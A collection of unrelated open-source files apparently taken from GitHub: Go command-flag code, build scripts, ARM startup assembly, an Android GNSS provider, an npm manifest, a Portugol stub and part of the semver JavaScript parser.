c.flagErrorBuf = new(bytes.Buffer)
c.flagErrorBuf.Reset()
c.flags = flag.NewFlagSet(c.Name(), flag.ContinueOnError)
c.flags.SetOutput(c.flagErrorBuf)
c.pflags = flag.NewFlagSet(c.Name(), flag.ContinueOnError)
c.pflags.SetOutput(c.flagErrorBuf)
c.lflags = nil
c.iflags = nil
c.parentsPflags = nil
}
// HasFlags checks if the command contains any flags (local plus persistent from the entire structure).
func (c *Command) HasFlags() bool {
return c.Flags().HasFlags()
}
// HasPersistentFlags checks if the command contains persistent flags.
func (c *Command) HasPersistentFlags() bool {
return c.PersistentFlags().HasFlags()
}
// HasLocalFlags checks if the command has flags specifically declared locally.
func (c *Command) HasLocalFlags() bool {
return c.LocalFlags().HasFlags()
}
// HasInheritedFlags checks if the command has flags inherited from its parent command.
func (c *Command) HasInheritedFlags() bool {
return c.InheritedFlags().HasFlags()
}
// HasAvailableFlags checks if the command contains any flags (local plus persistent from the entire
// structure) which are not hidden or deprecated.
func (c *Command) HasAvailableFlags() bool {
return c.Flags().HasAvailableFlags()
}
// HasAvailablePersistentFlags checks if the command contains persistent flags which are not hidden or deprecated.
func (c *Command) HasAvailablePersistentFlags() bool {
return c.PersistentFlags().HasAvailableFlags()
}
// HasAvailableLocalFlags checks if the command has flags specifically declared locally which are not hidden
// or deprecated.
func (c *Command) HasAvailableLocalFlags() bool {
return c.LocalFlags().HasAvailableFlags()
}
// HasAvailableInheritedFlags checks if the command has flags inherited from its parent command which are
// not hidden or deprecated.
func (c *Command) HasAvailableInheritedFlags() bool {
return c.InheritedFlags().HasAvailableFlags()
}
// Flag climbs up the command tree looking for matching flag.
func (c *Command) Flag(name string) (flag *flag.Flag) {
flag = c.Flags().Lookup(name)
if flag == nil {
flag = c.persistentFlag(name)
}
return
}
// Recursively find matching persistent flag.
func (c *Command) persistentFlag(name string) (flag *flag.Flag) {
if c.HasPersistentFlags() {
flag = c.PersistentFlags().Lookup(name)
}
if flag == nil {
c.updateParentsPflags()
flag = c.parentsPflags.Lookup(name)
}
return
}
// ParseFlags parses persistent flag tree and local flags.
func (c *Command) ParseFlags(args []string) error {
if c.DisableFlagParsing {
return nil
}
if c.flagErrorBuf == nil {
c.flagErrorBuf = new(bytes.Buffer)
}
beforeErrorBufLen := c.flagErrorBuf.Len()
c.mergePersistentFlags()
// do it here after merging all flags and just before parse
c.Flags().ParseErrorsWhitelist = flag.ParseErrorsWhitelist(c.FParseErrWhitelist)
err := c.Flags().Parse(args)
// Print warnings if they occurred (e.g. deprecated flag messages).
if c.flagErrorBuf.Len()-beforeErrorBufLen > 0 && err == nil {
c.Print(c.flagErrorBuf.String())
}
return err
}
// Parent returns a commands parent command.
func (c *Command) Parent() *Command {
return c.parent
}
// mergePersistentFlags merges c.PersistentFlags() to c.Flags()
// and adds missing persistent flags of all parents.
func (c *Command) mergePersistentFlags() {
c.updateParentsPflags()
c.Flags().AddFlagSet(c.PersistentFlags())
c.Flags().AddFlagSet(c.parentsPflags)
}
// updateParentsPflags updates c.parentsPflags by adding
// new persistent flags of all parents.
// If c.parentsPflags == nil, it makes new.
func (c *Command) updateParentsPflags() {
if c.parentsPflags == nil {
c.parentsPflags = flag.NewFlagSet(c.Name(), flag.ContinueOnError)
c.parentsPflags.SetOutput(c.flagErrorBuf)
c.parentsPflags.SortFlags = false
}
if c.globNormFunc != nil {
c.parentsPflags.SetNormalizeFunc(c.globNormFunc)
}
c.Root().PersistentFlags().AddFlagSet(flag.CommandLine)
c.VisitParents(func(parent *Command) {
c.parentsPflags.AddFlagSet(parent.PersistentFlags())
})
}
| {
"pile_set_name": "Github"
} |
#!/bin/bash
# If it has Build.PL use that, otherwise use Makefile.PL
if [ -f Build.PL ]; then
perl Build.PL
./Build
./Build test
# Make sure this goes in site
./Build install --installdirs site
elif [ -f Makefile.PL ]; then
# Make sure this goes in site
perl Makefile.PL INSTALLDIRS=site
make
make test
make install
else
echo 'Unable to find Build.PL or Makefile.PL. You need to modify build.sh.'
exit 1
fi
| {
"pile_set_name": "Github"
} |
desc_es=Generador de Informes de Análisis de Squid
| {
"pile_set_name": "Github"
} |
; <<< Use Configuration Wizard in Context Menu >>>
;******************************************************************************
;
; startup_rvmdk.S - Startup code for use with Keil's uVision.
;
; Copyright (c) 2013-2014 Texas Instruments Incorporated. All rights reserved.
; Software License Agreement
;
; Texas Instruments (TI) is supplying this software for use solely and
; exclusively on TI's microcontroller products. The software is owned by
; TI and/or its suppliers, and is protected under applicable copyright
; laws. You may not combine this software with "viral" open-source
; software in order to form a larger program.
;
; THIS SOFTWARE IS PROVIDED "AS IS" AND WITH ALL FAULTS.
; NO WARRANTIES, WHETHER EXPRESS, IMPLIED OR STATUTORY, INCLUDING, BUT
; NOT LIMITED TO, IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
; A PARTICULAR PURPOSE APPLY TO THIS SOFTWARE. TI SHALL NOT, UNDER ANY
; CIRCUMSTANCES, BE LIABLE FOR SPECIAL, INCIDENTAL, OR CONSEQUENTIAL
; DAMAGES, FOR ANY REASON WHATSOEVER.
;
; This is part of revision 2.1.0.12573 of the EK-TM4C1294XL Firmware Package.
;
;******************************************************************************
;******************************************************************************
;
; <o> Stack Size (in Bytes) <0x0-0xFFFFFFFF:8>
;
;******************************************************************************
Stack EQU 0x00000200
;******************************************************************************
;
; <o> Heap Size (in Bytes) <0x0-0xFFFFFFFF:8>
;
;******************************************************************************
Heap EQU 0x00000000
;******************************************************************************
;
; Allocate space for the stack.
;
;******************************************************************************
AREA STACK, NOINIT, READWRITE, ALIGN=3
StackMem
SPACE Stack
__initial_sp
;******************************************************************************
;
; Allocate space for the heap.
;
;******************************************************************************
AREA HEAP, NOINIT, READWRITE, ALIGN=3
__heap_base
HeapMem
SPACE Heap
__heap_limit
;******************************************************************************
;
; Indicate that the code in this file preserves 8-byte alignment of the stack.
;
;******************************************************************************
PRESERVE8
;******************************************************************************
;
; Place code into the reset code section.
;
;******************************************************************************
AREA RESET, CODE, READONLY
THUMB
;******************************************************************************
;
; The vector table.
;
;******************************************************************************
EXPORT __Vectors
__Vectors
DCD StackMem + Stack ; Top of Stack
DCD Reset_Handler ; Reset Handler
DCD NmiSR ; NMI Handler
DCD FaultISR ; Hard Fault Handler
DCD IntDefaultHandler ; The MPU fault handler
DCD IntDefaultHandler ; The bus fault handler
DCD IntDefaultHandler ; The usage fault handler
DCD 0 ; Reserved
DCD 0 ; Reserved
DCD 0 ; Reserved
DCD 0 ; Reserved
DCD IntDefaultHandler ; SVCall handler
DCD IntDefaultHandler ; Debug monitor handler
DCD 0 ; Reserved
DCD IntDefaultHandler ; The PendSV handler
DCD IntDefaultHandler ; The SysTick handler
DCD IntDefaultHandler ; GPIO Port A
DCD IntDefaultHandler ; GPIO Port B
DCD IntDefaultHandler ; GPIO Port C
DCD IntDefaultHandler ; GPIO Port D
DCD IntDefaultHandler ; GPIO Port E
DCD IntDefaultHandler ; UART0 Rx and Tx
DCD IntDefaultHandler ; UART1 Rx and Tx
DCD IntDefaultHandler ; SSI0 Rx and Tx
DCD IntDefaultHandler ; I2C0 Master and Slave
DCD IntDefaultHandler ; PWM Fault
DCD IntDefaultHandler ; PWM Generator 0
DCD IntDefaultHandler ; PWM Generator 1
DCD IntDefaultHandler ; PWM Generator 2
DCD IntDefaultHandler ; Quadrature Encoder 0
DCD IntDefaultHandler ; ADC Sequence 0
DCD IntDefaultHandler ; ADC Sequence 1
DCD IntDefaultHandler ; ADC Sequence 2
DCD IntDefaultHandler ; ADC Sequence 3
DCD IntDefaultHandler ; Watchdog timer
DCD IntDefaultHandler ; Timer 0 subtimer A
DCD IntDefaultHandler ; Timer 0 subtimer B
DCD IntDefaultHandler ; Timer 1 subtimer A
DCD IntDefaultHandler ; Timer 1 subtimer B
DCD IntDefaultHandler ; Timer 2 subtimer A
DCD IntDefaultHandler ; Timer 2 subtimer B
DCD IntDefaultHandler ; Analog Comparator 0
DCD IntDefaultHandler ; Analog Comparator 1
DCD IntDefaultHandler ; Analog Comparator 2
DCD IntDefaultHandler ; System Control (PLL, OSC, BO)
DCD IntDefaultHandler ; FLASH Control
DCD IntDefaultHandler ; GPIO Port F
DCD IntDefaultHandler ; GPIO Port G
DCD IntDefaultHandler ; GPIO Port H
DCD IntDefaultHandler ; UART2 Rx and Tx
DCD IntDefaultHandler ; SSI1 Rx and Tx
DCD IntDefaultHandler ; Timer 3 subtimer A
DCD IntDefaultHandler ; Timer 3 subtimer B
DCD IntDefaultHandler ; I2C1 Master and Slave
DCD IntDefaultHandler ; CAN0
DCD IntDefaultHandler ; CAN1
DCD IntDefaultHandler ; Ethernet
DCD IntDefaultHandler ; Hibernate
DCD IntDefaultHandler ; USB0
DCD IntDefaultHandler ; PWM Generator 3
DCD IntDefaultHandler ; uDMA Software Transfer
DCD IntDefaultHandler ; uDMA Error
DCD IntDefaultHandler ; ADC1 Sequence 0
DCD IntDefaultHandler ; ADC1 Sequence 1
DCD IntDefaultHandler ; ADC1 Sequence 2
DCD IntDefaultHandler ; ADC1 Sequence 3
DCD IntDefaultHandler ; External Bus Interface 0
DCD IntDefaultHandler ; GPIO Port J
DCD IntDefaultHandler ; GPIO Port K
DCD IntDefaultHandler ; GPIO Port L
DCD IntDefaultHandler ; SSI2 Rx and Tx
DCD IntDefaultHandler ; SSI3 Rx and Tx
DCD IntDefaultHandler ; UART3 Rx and Tx
DCD IntDefaultHandler ; UART4 Rx and Tx
DCD IntDefaultHandler ; UART5 Rx and Tx
DCD IntDefaultHandler ; UART6 Rx and Tx
DCD IntDefaultHandler ; UART7 Rx and Tx
DCD IntDefaultHandler ; I2C2 Master and Slave
DCD IntDefaultHandler ; I2C3 Master and Slave
DCD IntDefaultHandler ; Timer 4 subtimer A
DCD IntDefaultHandler ; Timer 4 subtimer B
DCD IntDefaultHandler ; Timer 5 subtimer A
DCD IntDefaultHandler ; Timer 5 subtimer B
DCD IntDefaultHandler ; FPU
DCD 0 ; Reserved
DCD 0 ; Reserved
DCD IntDefaultHandler ; I2C4 Master and Slave
DCD IntDefaultHandler ; I2C5 Master and Slave
DCD IntDefaultHandler ; GPIO Port M
DCD IntDefaultHandler ; GPIO Port N
DCD 0 ; Reserved
DCD IntDefaultHandler ; Tamper
DCD IntDefaultHandler ; GPIO Port P (Summary or P0)
DCD IntDefaultHandler ; GPIO Port P1
DCD IntDefaultHandler ; GPIO Port P2
DCD IntDefaultHandler ; GPIO Port P3
DCD IntDefaultHandler ; GPIO Port P4
DCD IntDefaultHandler ; GPIO Port P5
DCD IntDefaultHandler ; GPIO Port P6
DCD IntDefaultHandler ; GPIO Port P7
DCD IntDefaultHandler ; GPIO Port Q (Summary or Q0)
DCD IntDefaultHandler ; GPIO Port Q1
DCD IntDefaultHandler ; GPIO Port Q2
DCD IntDefaultHandler ; GPIO Port Q3
DCD IntDefaultHandler ; GPIO Port Q4
DCD IntDefaultHandler ; GPIO Port Q5
DCD IntDefaultHandler ; GPIO Port Q6
DCD IntDefaultHandler ; GPIO Port Q7
DCD IntDefaultHandler ; GPIO Port R
DCD IntDefaultHandler ; GPIO Port S
DCD IntDefaultHandler ; SHA/MD5 0
DCD IntDefaultHandler ; AES 0
DCD IntDefaultHandler ; DES3DES 0
DCD IntDefaultHandler ; LCD Controller 0
DCD IntDefaultHandler ; Timer 6 subtimer A
DCD IntDefaultHandler ; Timer 6 subtimer B
DCD IntDefaultHandler ; Timer 7 subtimer A
DCD IntDefaultHandler ; Timer 7 subtimer B
DCD IntDefaultHandler ; I2C6 Master and Slave
DCD IntDefaultHandler ; I2C7 Master and Slave
DCD IntDefaultHandler ; HIM Scan Matrix Keyboard 0
DCD IntDefaultHandler ; One Wire 0
DCD IntDefaultHandler ; HIM PS/2 0
DCD IntDefaultHandler ; HIM LED Sequencer 0
DCD IntDefaultHandler ; HIM Consumer IR 0
DCD IntDefaultHandler ; I2C8 Master and Slave
DCD IntDefaultHandler ; I2C9 Master and Slave
DCD IntDefaultHandler ; GPIO Port T
;******************************************************************************
;
; This is the code that gets called when the processor first starts execution
; following a reset event.
;
;******************************************************************************
EXPORT Reset_Handler
Reset_Handler
;
; Enable the floating-point unit. This must be done here to handle the
; case where main() uses floating-point and the function prologue saves
; floating-point registers (which will fault if floating-point is not
; enabled). Any configuration of the floating-point unit using
; DriverLib APIs must be done here prior to the floating-point unit
; being enabled.
;
; Note that this does not use DriverLib since it might not be included
; in this project.
;
MOVW R0, #0xED88
MOVT R0, #0xE000
LDR R1, [R0]
ORR R1, #0x00F00000
STR R1, [R0]
;
; Call the C library enty point that handles startup. This will copy
; the .data section initializers from flash to SRAM and zero fill the
; .bss section.
;
IMPORT __main
B __main
;******************************************************************************
;
; This is the code that gets called when the processor receives a NMI. This
; simply enters an infinite loop, preserving the system state for examination
; by a debugger.
;
;******************************************************************************
NmiSR
B NmiSR
;******************************************************************************
;
; This is the code that gets called when the processor receives a fault
; interrupt. This simply enters an infinite loop, preserving the system state
; for examination by a debugger.
;
;******************************************************************************
FaultISR
B FaultISR
;******************************************************************************
;
; This is the code that gets called when the processor receives an unexpected
; interrupt. This simply enters an infinite loop, preserving the system state
; for examination by a debugger.
;
;******************************************************************************
IntDefaultHandler
B IntDefaultHandler
;******************************************************************************
;
; Make sure the end of this section is aligned.
;
;******************************************************************************
ALIGN
;******************************************************************************
;
; Some code in the normal code section for initializing the heap and stack.
;
;******************************************************************************
AREA |.text|, CODE, READONLY
;******************************************************************************
;
; The function expected of the C library startup code for defining the stack
; and heap memory locations. For the C library version of the startup code,
; provide this function so that the C library initialization code can find out
; the location of the stack and heap.
;
;******************************************************************************
IF :DEF: __MICROLIB
EXPORT __initial_sp
EXPORT __heap_base
EXPORT __heap_limit
ELSE
IMPORT __use_two_region_memory
EXPORT __user_initial_stackheap
__user_initial_stackheap
LDR R0, =HeapMem
LDR R1, =(StackMem + Stack)
LDR R2, =(HeapMem + Heap)
LDR R3, =StackMem
BX LR
ENDIF
;******************************************************************************
;
; Make sure the end of this section is aligned.
;
;******************************************************************************
ALIGN
;******************************************************************************
;
; Tell the assembler that we're done.
;
;******************************************************************************
END
| {
"pile_set_name": "Github"
} |
<github-corner></github-corner>
<demo-header></demo-header>
<div class="container">
<div class="row">
<div class="col-sm-4">
<demo-options #options></demo-options>
</div>
<div class="col-sm-offset-1 col-sm-7">
<demo-table [loading]="options.data"></demo-table>
</div>
</div>
</div>
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2010-2018 Team Kodi
* This file is part of Kodi - https://kodi.tv
*
* SPDX-License-Identifier: GPL-2.0-or-later
* See LICENSES/README.md for more information.
*/
#pragma once
#include "cores/AudioEngine/Interfaces/AEResample.h"
class IAEResample;
namespace ActiveAE
{
/**
* Bit options to pass to CAEResampleFactory::Create
*/
enum AEResampleFactoryOptions
{
/* This is a quick resample job (e.g. resample a single noise packet) and may not be worth using GPU acceleration */
AERESAMPLEFACTORY_QUICK_RESAMPLE = 0x01
};
class CAEResampleFactory
{
public:
static IAEResample *Create(uint32_t flags = 0U);
};
}
| {
"pile_set_name": "Github"
} |
@echo on
:: Unset CircleCI default setting that prevents pulling Styrene from the public repo
git config --global --unset url."ssh://[email protected]".insteadOf "https://github.com"
:: Run Env preparation script in verbose mode (echo on)
call "%~dp0..\..\scripts\windows\msys2_prepare" -v
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2014 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.android.server.location;
import android.content.Context;
import android.location.GnssMeasurementsEvent;
import android.location.IGnssMeasurementsListener;
import android.os.Handler;
import android.os.RemoteException;
import android.provider.Settings;
import android.util.Log;
import com.android.internal.annotations.VisibleForTesting;
/**
* An base implementation for GPS measurements provider. It abstracts out the responsibility of
* handling listeners, while still allowing technology specific implementations to be built.
*
* @hide
*/
public abstract class GnssMeasurementsProvider
extends RemoteListenerHelper<IGnssMeasurementsListener> {
private static final String TAG = "GnssMeasurementsProvider";
private static final boolean DEBUG = Log.isLoggable(TAG, Log.DEBUG);
private final GnssMeasurementProviderNative mNative;
private boolean mIsCollectionStarted;
private boolean mEnableFullTracking;
protected GnssMeasurementsProvider(Context context, Handler handler) {
this(context, handler, new GnssMeasurementProviderNative());
}
@VisibleForTesting
GnssMeasurementsProvider(
Context context, Handler handler, GnssMeasurementProviderNative aNative) {
super(context, handler, TAG);
mNative = aNative;
}
void resumeIfStarted() {
if (DEBUG) {
Log.d(TAG, "resumeIfStarted");
}
if (mIsCollectionStarted) {
mNative.startMeasurementCollection(mEnableFullTracking);
}
}
@Override
public boolean isAvailableInPlatform() {
return mNative.isMeasurementSupported();
}
@Override
protected int registerWithService() {
int devOptions = Settings.Secure.getInt(mContext.getContentResolver(),
Settings.Global.DEVELOPMENT_SETTINGS_ENABLED, 0);
int fullTrackingToggled = Settings.Global.getInt(mContext.getContentResolver(),
Settings.Global.ENABLE_GNSS_RAW_MEAS_FULL_TRACKING, 0);
boolean enableFullTracking = (devOptions == 1 /* Developer Mode enabled */)
&& (fullTrackingToggled == 1 /* Raw Measurements Full Tracking enabled */);
boolean result = mNative.startMeasurementCollection(enableFullTracking);
if (result) {
mIsCollectionStarted = true;
mEnableFullTracking = enableFullTracking;
return RemoteListenerHelper.RESULT_SUCCESS;
} else {
return RemoteListenerHelper.RESULT_INTERNAL_ERROR;
}
}
@Override
protected void unregisterFromService() {
boolean stopped = mNative.stopMeasurementCollection();
if (stopped) {
mIsCollectionStarted = false;
}
}
public void onMeasurementsAvailable(final GnssMeasurementsEvent event) {
foreach((IGnssMeasurementsListener listener, CallerIdentity callerIdentity) -> {
if (!hasPermission(mContext, callerIdentity)) {
logPermissionDisabledEventNotReported(
TAG, callerIdentity.mPackageName, "GNSS measurements");
return;
}
listener.onGnssMeasurementsReceived(event);
});
}
/** Handle GNSS capabilities update from the GNSS HAL implementation. */
public void onCapabilitiesUpdated(boolean isGnssMeasurementsSupported) {
setSupported(isGnssMeasurementsSupported);
updateResult();
}
public void onGpsEnabledChanged() {
tryUpdateRegistrationWithService();
updateResult();
}
@Override
protected ListenerOperation<IGnssMeasurementsListener> getHandlerOperation(int result) {
int status;
switch (result) {
case RESULT_SUCCESS:
status = GnssMeasurementsEvent.Callback.STATUS_READY;
break;
case RESULT_NOT_AVAILABLE:
case RESULT_NOT_SUPPORTED:
case RESULT_INTERNAL_ERROR:
status = GnssMeasurementsEvent.Callback.STATUS_NOT_SUPPORTED;
break;
case RESULT_NOT_ALLOWED:
status = GnssMeasurementsEvent.Callback.STATUS_NOT_ALLOWED;
break;
case RESULT_GPS_LOCATION_DISABLED:
status = GnssMeasurementsEvent.Callback.STATUS_LOCATION_DISABLED;
break;
case RESULT_UNKNOWN:
return null;
default:
Log.v(TAG, "Unhandled addListener result: " + result);
return null;
}
return new StatusChangedOperation(status);
}
private static class StatusChangedOperation
implements ListenerOperation<IGnssMeasurementsListener> {
private final int mStatus;
public StatusChangedOperation(int status) {
mStatus = status;
}
@Override
public void execute(IGnssMeasurementsListener listener,
CallerIdentity callerIdentity) throws RemoteException {
listener.onStatusChanged(mStatus);
}
}
@VisibleForTesting
static class GnssMeasurementProviderNative {
public boolean isMeasurementSupported() {
return native_is_measurement_supported();
}
public boolean startMeasurementCollection(boolean enableFullTracking) {
return native_start_measurement_collection(enableFullTracking);
}
public boolean stopMeasurementCollection() {
return native_stop_measurement_collection();
}
}
private static native boolean native_is_measurement_supported();
private static native boolean native_start_measurement_collection(boolean enableFullTracking);
private static native boolean native_stop_measurement_collection();
}
| {
"pile_set_name": "Github"
} |
# #############################################################################
# Generic
# #############################################################################
# Build with -g -O0
debug = n
# Echo the build commands
verbose = n
# #############################################################################
# Click specific
# #############################################################################
# Build extra element groups under elements
CLICK_EXTRA_ELEMENT_GROUPS =
# #############################################################################
# MiniOS specific
# #############################################################################
## Configure netfront to use netmap
# Enable netmap
CONFIG_NETMAP = y
# Pick the netmap version
CONFIG_NETMAP_API = 10
# Enable blocking poll
CONFIG_NETFRONT_POLL = y
# Poll timeout
CONFIG_NETFRONT_POLLTIMEOUT = 10000
| {
"pile_set_name": "Github"
} |
{
"_args": [
[
{
"name": "css-what",
"raw": "[email protected]",
"rawSpec": "2.1",
"scope": null,
"spec": ">=2.1.0 <2.2.0",
"type": "range"
},
"/Users/yangcs/bin/prometheus-handbook/node_modules/gitbook-plugin-image-captions/node_modules/css-select"
]
],
"_cnpm_publish_time": 1448198714930,
"_from": "css-what@>=2.1.0 <2.2.0",
"_hasShrinkwrap": false,
"_id": "[email protected]",
"_inCache": true,
"_installable": true,
"_location": "/gitbook-plugin-image-captions/css-what",
"_nodeVersion": "5.0.0",
"_npmUser": {
"email": "[email protected]",
"name": "feedic"
},
"_npmVersion": "3.3.9",
"_phantomChildren": {},
"_requested": {
"name": "css-what",
"raw": "[email protected]",
"rawSpec": "2.1",
"scope": null,
"spec": ">=2.1.0 <2.2.0",
"type": "range"
},
"_requiredBy": [
"/gitbook-plugin-image-captions/css-select"
],
"_resolved": "https://registry.npm.taobao.org/css-what/download/css-what-2.1.0.tgz",
"_shasum": "9467d032c38cfaefb9f2d79501253062f87fa1bd",
"_shrinkwrap": null,
"_spec": "[email protected]",
"_where": "/Users/yangcs/bin/prometheus-handbook/node_modules/gitbook-plugin-image-captions/node_modules/css-select",
"author": {
"email": "[email protected]",
"name": "Felix Böhm",
"url": "http://feedic.com"
},
"bugs": {
"url": "https://github.com/fb55/css-what/issues"
},
"dependencies": {},
"description": "a CSS selector parser",
"devDependencies": {
"jshint": "2"
},
"directories": {},
"dist": {
"shasum": "9467d032c38cfaefb9f2d79501253062f87fa1bd",
"tarball": "https://registry.npmjs.org/css-what/-/css-what-2.1.0.tgz"
},
"engines": {
"node": "*"
},
"files": [
"index.js"
],
"gitHead": "fd6b9f62146efec8e17ee80ddaebdfb6ede21d7b",
"homepage": "https://github.com/fb55/css-what#readme",
"jshintConfig": {
"eqeqeq": true,
"eqnull": true,
"freeze": true,
"globals": {
"describe": true,
"it": true
},
"latedef": "nofunc",
"noarg": true,
"node": true,
"nonbsp": true,
"proto": true,
"quotmark": "double",
"smarttabs": true,
"trailing": true,
"undef": true,
"unused": true
},
"license": "BSD-like",
"main": "./index.js",
"maintainers": [
{
"email": "[email protected]",
"name": "feedic"
}
],
"name": "css-what",
"optionalDependencies": {},
"readme": "ERROR: No README data found!",
"repository": {
"url": "git+https://github.com/fb55/css-what.git"
},
"scripts": {
"test": "node tests/test.js && jshint *.js"
},
"version": "2.1.0"
}
| {
"pile_set_name": "Github"
} |
oslo.cache aims to provide a generic caching mechanism for OpenStack projects
by wrapping the dogpile.cache library. The dogpile.cache library provides
support memoization, key value storage and interfaces to common caching
backends such as Memcached.
WWW: https://docs.openstack.org/oslo.cache/latest/
WWW: https://github.com/openstack/oslo.cache
| {
"pile_set_name": "Github"
} |
/* CLIQUE NO SINAL DE "+", À ESQUERDA, PARA EXIBIR A DESCRIÇÃO DO EXEMPLO
*
* Copyright (C) 2014 - UNIVALI - Universidade do Vale do Itajaí
*
* Este arquivo de código fonte é livre para utilização, cópia e/ou modificação
* desde que este cabeçalho, contendo os direitos autorais e a descrição do programa,
* seja mantido.
*
* Se tiver dificuldade em compreender este exemplo, acesse as vídeoaulas do Portugol
* Studio para auxiliá-lo:
*
* https://www.youtube.com/watch?v=K02TnB3IGnQ&list=PLb9yvNDCid3jQAEbNoPHtPR0SWwmRSM-t
*
* Descrição:
*
*
*
* Autores:
*
* Luiz Fernando Noschang ([email protected])
*
* Data: 18/07/2014
*/
programa
{
funcao inicio()
{
}
}
/* $$$ Portugol Studio $$$
*
* Esta seção do arquivo guarda informações do Portugol Studio.
* Você pode apagá-la se estiver utilizando outro editor.
*
* @POSICAO-CURSOR = 568;
*/ | {
"pile_set_name": "Github"
} |
exports = module.exports = SemVer
var debug
/* istanbul ignore next */
if (typeof process === 'object' &&
process.env &&
process.env.NODE_DEBUG &&
/\bsemver\b/i.test(process.env.NODE_DEBUG)) {
debug = function () {
var args = Array.prototype.slice.call(arguments, 0)
args.unshift('SEMVER')
console.log.apply(console, args)
}
} else {
debug = function () {}
}
// Note: this is the semver.org version of the spec that it implements
// Not necessarily the package version of this code.
exports.SEMVER_SPEC_VERSION = '2.0.0'
var MAX_LENGTH = 256
var MAX_SAFE_INTEGER = Number.MAX_SAFE_INTEGER ||
/* istanbul ignore next */ 9007199254740991
// Max safe segment length for coercion.
var MAX_SAFE_COMPONENT_LENGTH = 16
// The actual regexps go on exports.re
var re = exports.re = []
var src = exports.src = []
var t = exports.tokens = {}
var R = 0
function tok (n) {
t[n] = R++
}
// The following Regular Expressions can be used for tokenizing,
// validating, and parsing SemVer version strings.
// ## Numeric Identifier
// A single `0`, or a non-zero digit followed by zero or more digits.
tok('NUMERICIDENTIFIER')
src[t.NUMERICIDENTIFIER] = '0|[1-9]\\d*'
tok('NUMERICIDENTIFIERLOOSE')
src[t.NUMERICIDENTIFIERLOOSE] = '[0-9]+'
// ## Non-numeric Identifier
// Zero or more digits, followed by a letter or hyphen, and then zero or
// more letters, digits, or hyphens.
tok('NONNUMERICIDENTIFIER')
src[t.NONNUMERICIDENTIFIER] = '\\d*[a-zA-Z-][a-zA-Z0-9-]*'
// ## Main Version
// Three dot-separated numeric identifiers.
tok('MAINVERSION')
src[t.MAINVERSION] = '(' + src[t.NUMERICIDENTIFIER] + ')\\.' +
'(' + src[t.NUMERICIDENTIFIER] + ')\\.' +
'(' + src[t.NUMERICIDENTIFIER] + ')'
tok('MAINVERSIONLOOSE')
src[t.MAINVERSIONLOOSE] = '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')\\.' +
'(' + src[t.NUMERICIDENTIFIERLOOSE] + ')\\.' +
'(' + src[t.NUMERICIDENTIFIERLOOSE] + ')'
// ## Pre-release Version Identifier
// A numeric identifier, or a non-numeric identifier.
tok('PRERELEASEIDENTIFIER')
src[t.PRERELEASEIDENTIFIER] = '(?:' + src[t.NUMERICIDENTIFIER] +
'|' + src[t.NONNUMERICIDENTIFIER] + ')'
tok('PRERELEASEIDENTIFIERLOOSE')
src[t.PRERELEASEIDENTIFIERLOOSE] = '(?:' + src[t.NUMERICIDENTIFIERLOOSE] +
'|' + src[t.NONNUMERICIDENTIFIER] + ')'
// ## Pre-release Version
// Hyphen, followed by one or more dot-separated pre-release version
// identifiers.
tok('PRERELEASE')
src[t.PRERELEASE] = '(?:-(' + src[t.PRERELEASEIDENTIFIER] +
'(?:\\.' + src[t.PRERELEASEIDENTIFIER] + ')*))'
tok('PRERELEASELOOSE')
src[t.PRERELEASELOOSE] = '(?:-?(' + src[t.PRERELEASEIDENTIFIERLOOSE] +
'(?:\\.' + src[t.PRERELEASEIDENTIFIERLOOSE] + ')*))'
// ## Build Metadata Identifier
// Any combination of digits, letters, or hyphens.
tok('BUILDIDENTIFIER')
src[t.BUILDIDENTIFIER] = '[0-9A-Za-z-]+'
// ## Build Metadata
// Plus sign, followed by one or more period-separated build metadata
// identifiers.
tok('BUILD')
src[t.BUILD] = '(?:\\+(' + src[t.BUILDIDENTIFIER] +
'(?:\\.' + src[t.BUILDIDENTIFIER] + ')*))'
// ## Full Version String
// A main version, followed optionally by a pre-release version and
// build metadata.
// Note that the only major, minor, patch, and pre-release sections of
// the version string are capturing groups. The build metadata is not a
// capturing group, because it should not ever be used in version
// comparison.
tok('FULL')
tok('FULLPLAIN')
src[t.FULLPLAIN] = 'v?' + src[t.MAINVERSION] +
src[t.PRERELEASE] + '?' +
src[t.BUILD] + '?'
src[t.FULL] = '^' + src[t.FULLPLAIN] + '$'
// like full, but allows v1.2.3 and =1.2.3, which people do sometimes.
// also, 1.0.0alpha1 (prerelease without the hyphen) which is pretty
// common in the npm registry.
tok('LOOSEPLAIN')
src[t.LOOSEPLAIN] = '[v=\\s]*' + src[t.MAINVERSIONLOOSE] +
src[t.PRERELEASELOOSE] + '?' +
src[t.BUILD] + '?'
tok('LOOSE')
src[t.LOOSE] = '^' + src[t.LOOSEPLAIN] + '$'
tok('GTLT')
src[t.GTLT] = '((?:<|>)?=?)'
// Something like "2.*" or "1.2.x".
// Note that "x.x" is a valid xRange identifer, meaning "any version"
// Only the first item is strictly required.
tok('XRANGEIDENTIFIERLOOSE')
src[t.XRANGEIDENTIFIERLOOSE] = src[t.NUMERICIDENTIFIERLOOSE] + '|x|X|\\*'
tok('XRANGEIDENTIFIER')
src[t.XRANGEIDENTIFIER] = src[t.NUMERICIDENTIFIER] + '|x|X|\\*'
tok('XRANGEPLAIN')
src[t.XRANGEPLAIN] = '[v=\\s]*(' + src[t.XRANGEIDENTIFIER] + ')' +
'(?:\\.(' + src[t.XRANGEIDENTIFIER] + ')' +
'(?:\\.(' + src[t.XRANGEIDENTIFIER] + ')' +
'(?:' + src[t.PRERELEASE] + ')?' +
src[t.BUILD] + '?' +
')?)?'
tok('XRANGEPLAINLOOSE')
src[t.XRANGEPLAINLOOSE] = '[v=\\s]*(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' +
'(?:\\.(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' +
'(?:\\.(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' +
'(?:' + src[t.PRERELEASELOOSE] + ')?' +
src[t.BUILD] + '?' +
')?)?'
tok('XRANGE')
src[t.XRANGE] = '^' + src[t.GTLT] + '\\s*' + src[t.XRANGEPLAIN] + '$'
